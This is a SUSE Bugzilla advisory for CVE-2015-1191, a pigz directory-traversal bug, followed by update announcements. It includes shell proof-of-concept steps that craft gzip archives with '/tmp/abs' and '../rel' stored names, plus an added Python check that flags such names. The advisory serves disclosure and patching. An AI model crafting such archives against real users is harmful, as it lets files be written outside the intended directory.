Bugzilla – Bug 913627
VUL-0: CVE-2015-1191: pigz: directory traversal while decompressing a file with restoring file name
Last modified: 2016-03-06 03:12:15 UTC
CVE-2015-1191

pigz is susceptible to directory traversal vulnerabilities. While decompressing a file with restoring file name, it (unlike gzip) will happily use absolute and relative paths taken from the input. This can be exploited by a malicious archive to write files outside the current directory.

1. Absolute path.

A sample could be prepared in the following way:

    $ touch XtmpXabs
    $ gzip -c XtmpXabs | sed 's|XtmpXabs|/tmp/abs|g' > abs.gz
    $ rm XtmpXabs

Then check it works:

    $ ls /tmp/abs
    ls: cannot access /tmp/abs: No such file or directory
    $ unpigz -N abs.gz
    $ ls /tmp/abs
    /tmp/abs

2. Relative path with "..".

A sample could be prepared in the following way:

    $ rm ../rel
    $ touch XXXrel
    $ gzip -c XXXrel | sed 's|XXXrel|../rel|g' > rel.gz
    $ rm XXXrel

Then check it works:

    $ ls ../rel
    ls: cannot access ../rel: No such file or directory
    $ unpigz -N rel.gz
    $ ls ../rel
    ../rel

References:
https://github.com/madler/pigz/commit/fdad1406b3ec809f4954ff7cdf9e99eb18c2458f (fix)
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1191
http://seclists.org/oss-sec/2015/q1/170
http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1191.html
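
A defender-side check for the behaviour reported above, as an added example that is not part of the original report or of pigz's code: it reads the stored name (the FNAME field of RFC 1952) from a gzip header before anything is decompressed and flags the two cases shown in the report, an absolute path and a ".." component. The function names `stored_name`, `audit_name` and `sample` are hypothetical, and the sample archives are constructed inline.

```python
import posixpath
import struct

FEXTRA, FNAME = 0x04, 0x08  # FLG bits from RFC 1952


def stored_name(data):
    """Return the FNAME field of the first gzip member header, or None."""
    if len(data) < 10 or data[:2] != b"\x1f\x8b" or data[2] != 8:
        raise ValueError("not a gzip (deflate) stream")
    flags, pos = data[3], 10  # fixed header is 10 bytes
    if flags & FEXTRA:  # optional extra field precedes the name
        if len(data) < pos + 2:
            raise ValueError("truncated header")
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if not flags & FNAME:
        return None
    end = data.find(b"\x00", pos)
    if end < 0:
        raise ValueError("unterminated FNAME field")
    return data[pos:end].decode("latin-1")  # RFC 1952: ISO 8859-1


def audit_name(name):
    """Return (problems, safe_name); safe_name keeps only the last component."""
    problems = []
    if name.startswith("/"):
        problems.append("absolute path")
    if ".." in name.split("/"):
        problems.append("parent-directory component")
    base = posixpath.basename(name)
    return problems, (None if base in ("", ".", "..") else base)


def sample(name):
    """Constructed input: an empty gzip member whose header stores `name`."""
    header = b"\x1f\x8b\x08\x08" + b"\x00" * 4 + b"\x00\x03" + name + b"\x00"
    return header + b"\x03\x00" + b"\x00" * 8  # empty deflate, CRC32, ISIZE


if __name__ == "__main__":
    for raw in (b"/tmp/abs", b"../rel", b"XXXrel"):  # names used in the report
        name = stored_name(sample(raw))
        print(name, *audit_name(name))
```
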
bugbot adjusting priority
An update workflow for this issue was started. This issue was rated as moderate. Please submit fixed packages until 2015-02-27. When done, reassign the bug to security-team@suse.de. https://swamp.suse.de/webswamp/wf/60669
Alex, any news here? The due date for submission was 2015-02-27. TIA.
SUSE-SU-2015:0670-1: An update that fixes one vulnerability is now available.
Category: security (moderate)
Bug References: 913627
CVE References: CVE-2015-1191
Sources used:
SUSE Linux Enterprise Server 12 (src): pigz-2.3-5.1
SUSE Linux Enterprise Desktop 12 (src): pigz-2.3-5.1
SUSE-SU-2015:0716-1: An update that fixes one vulnerability is now available.
Category: security (moderate)
Bug References: 913627
CVE References: CVE-2015-1191
Sources used:
SUSE Studio Onsite 1.3 (src): pigz-2.1.6-0.12.1
openSUSE Leap 42.1 Update already imported from SLE. Copied 13.2 and 13.1 submissions.
This is an autogenerated message for OBS integration: This bug (913627) was mentioned in https://build.opensuse.org/request/show/365313 13.2 / pigz
release 13.2
openSUSE-SU-2016:0650-1: An update that fixes one vulnerability is now available.
Category: security (moderate)
Bug References: 913627
CVE References: CVE-2015-1191
Sources used:
openSUSE 13.2 (src): pigz-2.3-4.3.1
openSUSE-SU-2016:0662-1: An update that fixes one vulnerability is now available.
Category: security (moderate)
Bug References: 913627
CVE References: CVE-2015-1191
Sources used:
openSUSE 13.1 (src): pigz-2.3-2.3.1